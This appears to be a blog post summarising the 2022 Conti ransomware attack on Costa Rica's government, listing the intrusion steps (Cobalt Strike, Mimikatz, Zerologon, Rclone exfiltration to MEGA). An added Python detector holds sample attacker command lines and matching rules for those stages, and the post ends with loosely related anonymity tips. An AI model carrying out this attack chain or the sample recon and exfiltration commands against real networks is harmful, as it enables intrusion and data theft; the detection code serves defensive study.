
Costa Rican Government Cyber-attack Revealed

The attackers, known as "Conti", a ransomware group that operates on the Dark Web, began their attack on April 11th, 2022.

Their entry point was a compromised VPN account, so don't share your login details, and make your passwords long and complicated.

Apparently the president of Costa Rica declared a state of emergency and claimed that traitors helped the hackers during the attacks; whether this is true or not, always think security.

It only took three months for them to come clean about the breach, nice.

How they accessed the systems:

The group used a system of Costa Rica’s Ministry of Finance as the entry point. A member, named MemberX, gained access by using a VPN connection and compromised credentials. According to the report published by AdvIntel, in the early stages of the attack, the group set up over 10 Cobalt Strike beacons. The initial attack vector for this operation was compromised credential access via VPN.

According to the report, the group used the following methods:

  1. The infection followed a typical attack flow wherein the adversaries gained access from the compromised VPN log by installing a crypted form of Cobalt Strike inside the Costa Rica sub-network.
  2. The adversaries obtained local network domain administrator and enterprise administrator recon.
  3. The threat actors then performed network reconnaissance via Nltest domain trust enumeration, before scanning the network for file shares by leveraging the ShareFinder utility and AdFind from C:\ProgramData.
  4. The adversary (referenced by internal pseudonym “MemberX”) downloaded the fileshare output on their local machine via the Cobalt Strike channel.
  5. Then, the adversaries leveraged Cobalt Strike’s Mimikatz to dump logon passwords and NTDS hashes of the local machine users, obtaining plaintext and brute-forceable local admin, domain, and enterprise administrator hashes.
  6. The adversaries leveraged the enterprise user credentials to perform a DCSync and Zerologon attack. This effectively gained them access to every host on the Costa Rica interconnected networks.
  7. The adversaries then uploaded MSI scripts with Atera Remote Management Tool (RMM), the remote hosts selecting those with local admin access and less user activity. This established “anchoring” and safe return in case the threat actors’ beacons were burned or detected by the well-known EDR tool utilized by Costa Rica.
  8. The adversaries pinged the whole network and re-scanned the network domain trusts, leveraging enterprise administrator credentials with ShareFinder and compiling a list of all corporate assets and databases available under their new elevated privileges.
  9. On several network hosts, the adversaries also created a Rclone configuration file, which their data exfiltration tool leveraged as input with the MEGA Share uploader. They then began exfiltration from the network.
  10. The adversaries uploaded Process Hacker, Power Tools, and Do Not Sleep tools, and batch scripts filled in with the fileshare access locations.
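Several of the stages above leave distinct traces in process-creation telemetry (Nltest trust enumeration, AdFind run from C:\ProgramData, an Atera MSI install, Rclone pointed at MEGA). The following is an added example, not code from the original article or from the AdvIntel report, that runs simple rules over constructed Sysmon-style events and flags hosts where more than one stage fired; hostnames, paths and patterns are illustrative assumptions.

```python
import re
from collections import defaultdict

# Constructed sample process-creation events (Sysmon Event ID 1 style, simplified).
# Illustrative only; not log data from the Costa Rica incident.
SAMPLE_EVENTS = [
    {"host": "FIN-WS01", "image": r"C:\Windows\System32\nltest.exe",
     "cmdline": "nltest /domain_trusts /all_trusts"},
    {"host": "FIN-WS01", "image": r"C:\ProgramData\AdFind.exe",
     "cmdline": 'AdFind.exe -f "(objectcategory=computer)"'},
    {"host": "FIN-SRV02", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec /i C:\Users\Public\AteraAgent.msi /qn"},
    {"host": "FIN-SRV02", "image": r"C:\Users\Public\rclone.exe",
     "cmdline": r"rclone copy D:\Shares\Finance mega:staging --config C:\Users\Public\rclone.conf"},
    {"host": "HR-WS07", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe report.txt"},
]

# One rule per stage of the chain: (name, regex applied to "image cmdline", case-insensitive).
# The Atera filename pattern is an assumption; real installers may be renamed.
RULES = [
    ("domain_trust_enum", r"\bnltest\b.*/domain_trusts"),
    ("recon_tool_in_programdata", r"^c:\\programdata\\[^ ]*(adfind|sharefinder)"),
    ("atera_rmm_msi_install", r"\bmsiexec\b.*atera[^ ]*\.msi"),
    ("rclone_to_mega", r"\brclone\b.*\bmega:"),
]

def match_rules(event):
    """Return the names of all rules that fire on a single event."""
    text = f"{event['image']} {event['cmdline']}"
    return [name for name, pat in RULES if re.search(pat, text, re.IGNORECASE)]

def hits_per_host(events):
    """Group distinct rule hits by host so stages of one chain are seen together."""
    hits = defaultdict(set)
    for ev in events:
        for name in match_rules(ev):
            hits[ev["host"]].add(name)
    return {host: sorted(names) for host, names in hits.items()}

def chained_hosts(events, min_stages=2):
    """Hosts where two or more different stages fired: a stronger signal than a lone hit."""
    return sorted(h for h, names in hits_per_host(events).items() if len(names) >= min_stages)

if __name__ == "__main__":
    for host, names in hits_per_host(SAMPLE_EVENTS).items():
        print(host, names)
    print("chained:", chained_hosts(SAMPLE_EVENTS))
```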

This caused Rodrigo Chaves Robles, the President of Costa Rica, to declare a state of national emergency due to the cyber-attack.

Free advice, don't use Windows:

Always use a long, very long, and complicated password for everything, from accessing your computer to a VPN, and never use your own MasterCard or VISA.

All cash, Zcash or Monero.

DO NOT USE:

Do not use the name of anyone related to you, or of known friends. No phone number, birthdate, the date someone got pregnant, or the like.

No social media: not as yourself, anyway.

If you use Linux: set up honeypots for your server or your website.
